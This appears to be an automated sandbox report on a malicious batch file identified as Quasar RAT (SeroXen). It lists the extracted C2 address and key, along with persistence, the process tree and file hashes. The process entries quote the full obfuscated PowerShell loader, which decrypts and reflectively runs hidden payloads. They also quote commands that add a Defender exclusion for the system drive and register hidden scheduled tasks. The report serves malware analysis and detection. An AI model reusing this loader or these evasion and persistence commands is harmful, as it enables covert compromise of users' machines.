Analysis
-
max time kernel
134s -
max time network
135s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
28-04-2024 16:14
Static task
static1
Behavioral task
behavioral1
Sample
rename me.bat
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
rename me.bat
Resource
win10v2004-20240426-en
General
-
Target
rename me.bat
-
Size
514KB
-
MD5
414264bb47935bed191128cf44f3a2cd
-
SHA1
df49e4f8bc8d388c9b9398f29b0de0e72e79b130
-
SHA256
a59ef50cd65d900c84024d9da88c4c93c9ae7fba7e2429c41d45081d381ad8ef
-
SHA512
c15ca12cd576157369574c3a51ece0879ccee3b57614af91d6e99af21e8fdeb46d1680e2692a38d4da6b4ebb63f9e17341d0cc6ac616e6c2ebd36e698e588e66
-
SSDEEP
12288:40xb2yL+sSyycyuVWTuM+EiWCCPt2EIKgEtoOT9ah:46bTLrSyycy9uM+EipCfhgTOTAh
Malware Config
Extracted
quasar
3.1.5
SeroXen
147.185.221.19:33587
$Sxr-2rfrZTKITtK0P0zGYG
-
encryption_key
Yr0YpBPNd3kXsl43jZMx
-
install_name
$sxr-sdinwn.exe
-
log_directory
$sxr
-
reconnect_delay
3000
-
startup_key
$sxr-metsha
-
subdirectory
sxr
Signatures
-
Quasar payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/2144-195-0x0000000008F10000-0x0000000008F7E000-memory.dmp family_quasar -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 2 2144 powershell.exe -
Drops file in Drivers directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts powershell.exe -
Executes dropped EXE 1 IoCs
Processes:
$sxr-sdinwn.exepid process 2616 $sxr-sdinwn.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 1 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
Processes:
ipconfig.exepid process 4248 ipconfig.exe -
Modifies registry class 1 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 15 IoCs
Processes:
powershell.exepowershell.exepowershell.exe$sxr-sdinwn.exepowershell.exepid process 4936 powershell.exe 4936 powershell.exe 4936 powershell.exe 32 powershell.exe 32 powershell.exe 32 powershell.exe 2144 powershell.exe 2144 powershell.exe 2144 powershell.exe 2616 $sxr-sdinwn.exe 5004 powershell.exe 5004 powershell.exe 2616 $sxr-sdinwn.exe 5004 powershell.exe 2616 $sxr-sdinwn.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 4936 powershell.exe Token: SeDebugPrivilege 32 powershell.exe Token: SeIncreaseQuotaPrivilege 32 powershell.exe Token: SeSecurityPrivilege 32 powershell.exe Token: SeTakeOwnershipPrivilege 32 powershell.exe Token: SeLoadDriverPrivilege 32 powershell.exe Token: SeSystemProfilePrivilege 32 powershell.exe Token: SeSystemtimePrivilege 32 powershell.exe Token: SeProfSingleProcessPrivilege 32 powershell.exe Token: SeIncBasePriorityPrivilege 32 powershell.exe Token: SeCreatePagefilePrivilege 32 powershell.exe Token: SeBackupPrivilege 32 powershell.exe Token: SeRestorePrivilege 32 powershell.exe Token: SeShutdownPrivilege 32 powershell.exe Token: SeDebugPrivilege 32 powershell.exe Token: SeSystemEnvironmentPrivilege 32 powershell.exe Token: SeRemoteShutdownPrivilege 32 powershell.exe Token: SeUndockPrivilege 32 powershell.exe Token: SeManageVolumePrivilege 32 powershell.exe Token: 33 32 powershell.exe Token: 34 32 powershell.exe Token: 35 32 powershell.exe Token: 36 32 powershell.exe Token: SeIncreaseQuotaPrivilege 32 powershell.exe Token: SeSecurityPrivilege 32 powershell.exe Token: SeTakeOwnershipPrivilege 32 powershell.exe Token: SeLoadDriverPrivilege 32 powershell.exe Token: SeSystemProfilePrivilege 32 powershell.exe Token: SeSystemtimePrivilege 32 powershell.exe Token: SeProfSingleProcessPrivilege 32 powershell.exe Token: SeIncBasePriorityPrivilege 32 powershell.exe Token: SeCreatePagefilePrivilege 32 powershell.exe Token: SeBackupPrivilege 32 powershell.exe Token: SeRestorePrivilege 32 powershell.exe Token: SeShutdownPrivilege 32 powershell.exe Token: SeDebugPrivilege 32 powershell.exe Token: SeSystemEnvironmentPrivilege 32 powershell.exe Token: SeRemoteShutdownPrivilege 32 powershell.exe Token: SeUndockPrivilege 32 powershell.exe Token: SeManageVolumePrivilege 32 powershell.exe Token: 33 32 powershell.exe Token: 34 32 powershell.exe Token: 35 32 powershell.exe Token: 36 32 powershell.exe Token: SeIncreaseQuotaPrivilege 32 powershell.exe Token: SeSecurityPrivilege 32 powershell.exe Token: SeTakeOwnershipPrivilege 32 powershell.exe Token: SeLoadDriverPrivilege 32 powershell.exe Token: SeSystemProfilePrivilege 32 powershell.exe Token: SeSystemtimePrivilege 32 powershell.exe Token: SeProfSingleProcessPrivilege 32 powershell.exe Token: SeIncBasePriorityPrivilege 32 powershell.exe Token: SeCreatePagefilePrivilege 32 powershell.exe Token: SeBackupPrivilege 32 powershell.exe Token: SeRestorePrivilege 32 powershell.exe Token: SeShutdownPrivilege 32 powershell.exe Token: SeDebugPrivilege 32 powershell.exe Token: SeSystemEnvironmentPrivilege 32 powershell.exe Token: SeRemoteShutdownPrivilege 32 powershell.exe Token: SeUndockPrivilege 32 powershell.exe Token: SeManageVolumePrivilege 32 powershell.exe Token: 33 32 powershell.exe Token: 34 32 powershell.exe Token: 35 32 powershell.exe -
Suspicious use of WriteProcessMemory 27 IoCs
Processes:
cmd.exepowershell.exeWScript.execmd.exepowershell.exedescription pid process target process PID 4240 wrote to memory of 4936 4240 cmd.exe powershell.exe PID 4240 wrote to memory of 4936 4240 cmd.exe powershell.exe PID 4240 wrote to memory of 4936 4240 cmd.exe powershell.exe PID 4936 wrote to memory of 32 4936 powershell.exe powershell.exe PID 4936 wrote to memory of 32 4936 powershell.exe powershell.exe PID 4936 wrote to memory of 32 4936 powershell.exe powershell.exe PID 4936 wrote to memory of 2968 4936 powershell.exe WScript.exe PID 4936 wrote to memory of 2968 4936 powershell.exe WScript.exe PID 4936 wrote to memory of 2968 4936 powershell.exe WScript.exe PID 2968 wrote to memory of 3156 2968 WScript.exe cmd.exe PID 2968 wrote to memory of 3156 2968 WScript.exe cmd.exe PID 2968 wrote to memory of 3156 2968 WScript.exe cmd.exe PID 3156 wrote to memory of 2144 3156 cmd.exe powershell.exe PID 3156 wrote to memory of 2144 3156 cmd.exe powershell.exe PID 3156 wrote to memory of 2144 3156 cmd.exe powershell.exe PID 2144 wrote to memory of 4928 2144 powershell.exe schtasks.exe PID 2144 wrote to memory of 4928 2144 powershell.exe schtasks.exe PID 2144 wrote to memory of 4928 2144 powershell.exe schtasks.exe PID 2144 wrote to memory of 2616 2144 powershell.exe $sxr-sdinwn.exe PID 2144 wrote to memory of 2616 2144 powershell.exe $sxr-sdinwn.exe PID 2144 wrote to memory of 2616 2144 powershell.exe $sxr-sdinwn.exe PID 2144 wrote to memory of 5004 2144 powershell.exe powershell.exe PID 2144 wrote to memory of 5004 2144 powershell.exe powershell.exe PID 2144 wrote to memory of 5004 2144 powershell.exe powershell.exe PID 2144 wrote to memory of 4248 2144 powershell.exe ipconfig.exe PID 2144 wrote to memory of 4248 2144 powershell.exe ipconfig.exe PID 2144 wrote to memory of 4248 2144 powershell.exe ipconfig.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\rename me.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('u1oRCj2FshaYqShJzWoB9MDj3heRxmVxxmXikszKBtg='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uZjnBsjcIwRFHmtV5yG+9A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BrvxA=New-Object System.IO.MemoryStream(,$param_var); $VtfzT=New-Object System.IO.MemoryStream; $asXGT=New-Object System.IO.Compression.GZipStream($BrvxA, [IO.Compression.CompressionMode]::Decompress); $asXGT.CopyTo($VtfzT); $asXGT.Dispose(); $BrvxA.Dispose(); $VtfzT.Dispose(); $VtfzT.ToArray();}function execute_function($param_var,$param2_var){ $ulMDb=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $TvXyl=$ulMDb.EntryPoint; $TvXyl.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\rename me.bat';$lVIfc=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\rename me.bat').Split([Environment]::NewLine);foreach ($ZSRPZ in $lVIfc) { if ($ZSRPZ.StartsWith(':: ')) { $Lwvfw=$ZSRPZ.Substring(3); break; }}$payloads_var=[string[]]$Lwvfw.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_806_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_806.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_806.vbs"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_806.bat" "4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('u1oRCj2FshaYqShJzWoB9MDj3heRxmVxxmXikszKBtg='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uZjnBsjcIwRFHmtV5yG+9A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BrvxA=New-Object System.IO.MemoryStream(,$param_var); $VtfzT=New-Object System.IO.MemoryStream; $asXGT=New-Object System.IO.Compression.GZipStream($BrvxA, [IO.Compression.CompressionMode]::Decompress); $asXGT.CopyTo($VtfzT); $asXGT.Dispose(); $BrvxA.Dispose(); $VtfzT.Dispose(); $VtfzT.ToArray();}function execute_function($param_var,$param2_var){ $ulMDb=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $TvXyl=$ulMDb.EntryPoint; $TvXyl.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_806.bat';$lVIfc=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_806.bat').Split([Environment]::NewLine);foreach ($ZSRPZ in $lVIfc) { if ($ZSRPZ.StartsWith(':: ')) { $Lwvfw=$ZSRPZ.Substring(3); break; }}$payloads_var=[string[]]$Lwvfw.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));5⤵
- Blocklisted process makes network request
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "$sxr-metsha" /sc ONLOGON /tr "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" /rl HIGHEST /f6⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\sxr\$sxr-sdinwn.exe"C:\Users\Admin\AppData\Roaming\sxr\$sxr-sdinwn.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath (Get-Item -LiteralPath $env:SystemRoot).Root"6⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\ipconfig.exe"C:\Windows\System32\ipconfig.exe" /flushdns6⤵
- Gathers network information
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logFilesize
2KB
MD5ac3d19fbb5c5f10833f1882308f77548
SHA1ac880466fd99a5719fedc7289b00d78ba7088e06
SHA2563353b90af649198e084632af776f8c6ea3a9302da5a50d85f7ecde1c7ad295df
SHA512b5e6369d7f475e9931d19fb2a5305b4c901ca5fcac5d788d064b6a1b1d6de2034e84932ac243d5056c745b924a2e9537a06b4172fab364402263788c814bc28b
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
17KB
MD5e085227e9c4daf9b7805ea75df49efcc
SHA19fed1eb524693c4dcb99d38e3d94e77d73716c8b
SHA256f1bcecef924fadd06aabf96aecf26291d1e2ed3b1ee7e24ad89ac8c6ed376cdb
SHA512a622f40d0e68d20236a1020c713dbc208069c2fbdb26be73cc78d484aabc9a8f0d5156a0ed8f6148c05e8b635c457f7c18220686ef1bf619b492995e78f3649f
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
18KB
MD5e6498f178b1860bbc7389d4d8187d561
SHA102a11d66d29a68764ab7e51c963f67ec76dce04b
SHA25615d7ae8e1ef925970be9cbefb1555d09f8ae4a77f0d0119f1fe85ad4b61e9a46
SHA512fa74ac1762af6fee08c339f46e91a9813960694ba78ed3fe3df54edf008b313d69475c2c47b37f0aad47c48341a74293d1fd0a598290ac615c8dbff533a6b80d
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_43kzohf1.fn5.ps1Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
C:\Users\Admin\AppData\Roaming\startup_str_806.batFilesize
514KB
MD5414264bb47935bed191128cf44f3a2cd
SHA1df49e4f8bc8d388c9b9398f29b0de0e72e79b130
SHA256a59ef50cd65d900c84024d9da88c4c93c9ae7fba7e2429c41d45081d381ad8ef
SHA512c15ca12cd576157369574c3a51ece0879ccee3b57614af91d6e99af21e8fdeb46d1680e2692a38d4da6b4ebb63f9e17341d0cc6ac616e6c2ebd36e698e588e66
-
C:\Users\Admin\AppData\Roaming\startup_str_806.vbsFilesize
115B
MD56d1392bb8bb22c98c9b386ef0475810b
SHA18e923691f6563f196e347117de16067693b59cfd
SHA256b37a78325720924020973b3223ff4374cc96dfc0e5f243bec30eebf02a5999e9
SHA512c76f221e4c9be62e611744e388b4e5f55c3d017a5a2fbe7be56aea69a40cf587e3bfb2441303f46b9c74685275dee074c63e74d49ad1f71d5b29acd03dc2e79a
-
C:\Users\Admin\AppData\Roaming\sxr\$sxr-sdinwn.exeFilesize
420KB
MD5be8ffebe1c4b5e18a56101a3c0604ea0
SHA12ec8af7c1538974d64291845dcb02111b907770f
SHA256d2434e607451a4d29d28f43a529246dc81d25a2fae9c271e28c55452c09a28a5
SHA51271008aa20932c8ecf48582d3b9678ba184e99d482daec9287a124f20af7184f1b02f800e2bdc83f6eb45832af6fdce88bfaf0e3398c617812969d0d27750fdeb
-
memory/32-62-0x0000000070BC0000-0x0000000070C0B000-memory.dmpFilesize
300KB
-
memory/32-69-0x00000000071B0000-0x00000000071C0000-memory.dmpFilesize
64KB
-
memory/32-68-0x00000000098D0000-0x0000000009975000-memory.dmpFilesize
660KB
-
memory/32-61-0x0000000009870000-0x00000000098A3000-memory.dmpFilesize
204KB
-
memory/32-60-0x000000007FD00000-0x000000007FD10000-memory.dmpFilesize
64KB
-
memory/32-42-0x0000000073EE0000-0x00000000745CE000-memory.dmpFilesize
6.9MB
-
memory/32-43-0x00000000071B0000-0x00000000071C0000-memory.dmpFilesize
64KB
-
memory/32-163-0x0000000073EE0000-0x00000000745CE000-memory.dmpFilesize
6.9MB
-
memory/32-155-0x00000000071B0000-0x00000000071C0000-memory.dmpFilesize
64KB
-
memory/32-70-0x0000000009B80000-0x0000000009C14000-memory.dmpFilesize
592KB
-
memory/32-63-0x0000000009830000-0x000000000984E000-memory.dmpFilesize
120KB
-
memory/2144-195-0x0000000008F10000-0x0000000008F7E000-memory.dmpFilesize
440KB
-
memory/2144-196-0x00000000090C0000-0x0000000009152000-memory.dmpFilesize
584KB
-
memory/2144-199-0x00000000069C0000-0x00000000069D2000-memory.dmpFilesize
72KB
-
memory/2144-200-0x0000000009060000-0x000000000909E000-memory.dmpFilesize
248KB
-
memory/2616-266-0x00000000083F0000-0x000000000842C000-memory.dmpFilesize
240KB
-
memory/4936-32-0x000000000B730000-0x000000000BC2E000-memory.dmpFilesize
5.0MB
-
memory/4936-23-0x0000000007300000-0x0000000007310000-memory.dmpFilesize
64KB
-
memory/4936-10-0x0000000008090000-0x00000000080AC000-memory.dmpFilesize
112KB
-
memory/4936-31-0x00000000098D0000-0x0000000009932000-memory.dmpFilesize
392KB
-
memory/4936-30-0x0000000004FD0000-0x0000000004FD8000-memory.dmpFilesize
32KB
-
memory/4936-29-0x0000000009830000-0x000000000984A000-memory.dmpFilesize
104KB
-
memory/4936-6-0x00000000077F0000-0x0000000007812000-memory.dmpFilesize
136KB
-
memory/4936-8-0x0000000008130000-0x0000000008196000-memory.dmpFilesize
408KB
-
memory/4936-7-0x00000000080C0000-0x0000000008126000-memory.dmpFilesize
408KB
-
memory/4936-5-0x0000000007940000-0x0000000007F68000-memory.dmpFilesize
6.2MB
-
memory/4936-28-0x000000000A0B0000-0x000000000A728000-memory.dmpFilesize
6.5MB
-
memory/4936-2-0x00000000050C0000-0x00000000050F6000-memory.dmpFilesize
216KB
-
memory/4936-198-0x0000000073EE0000-0x00000000745CE000-memory.dmpFilesize
6.9MB
-
memory/4936-9-0x00000000081A0000-0x00000000084F0000-memory.dmpFilesize
3.3MB
-
memory/4936-12-0x0000000008890000-0x0000000008906000-memory.dmpFilesize
472KB
-
memory/4936-4-0x0000000007300000-0x0000000007310000-memory.dmpFilesize
64KB
-
memory/4936-11-0x0000000008630000-0x000000000867B000-memory.dmpFilesize
300KB
-
memory/4936-3-0x0000000073EE0000-0x00000000745CE000-memory.dmpFilesize
6.9MB
-
memory/5004-286-0x0000000070BC0000-0x0000000070C0B000-memory.dmpFilesize
300KB
-
memory/5004-291-0x0000000009870000-0x0000000009915000-memory.dmpFilesize
660KB
-
memory/5004-488-0x00000000099E0000-0x00000000099FA000-memory.dmpFilesize
104KB
-
memory/5004-493-0x00000000099D0000-0x00000000099D8000-memory.dmpFilesize
32KB
-
memory/5004-277-0x00000000092E0000-0x0000000009302000-memory.dmpFilesize
136KB